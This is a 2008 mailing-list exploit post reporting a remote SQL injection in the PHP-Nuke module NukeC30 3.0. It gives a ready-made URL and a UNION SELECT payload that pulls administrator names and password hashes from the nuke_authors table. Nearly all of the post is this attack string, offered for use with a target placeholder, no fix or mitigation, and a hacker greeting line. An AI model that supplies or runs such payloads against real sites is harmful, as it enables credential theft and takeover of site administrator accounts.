PHP-Nuke Module NukeC30 sql injection
Date: 11 Mar 2008 12:22:18 -0000
From: [email protected]
To: [email protected]
Subject: PHP-Nuke Module NukeC30 sql injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
= Author : HouSSaMix from H-T Team
= Script : PHP-Nuke Module NukeC30
Module's Name: NukeC30
Module's Version: 3.0
= BUG : Remote SQL Injection
= Exploit :
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=[SQL]
[SQL]= -1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2
= Greetz : All muslims HaCkers
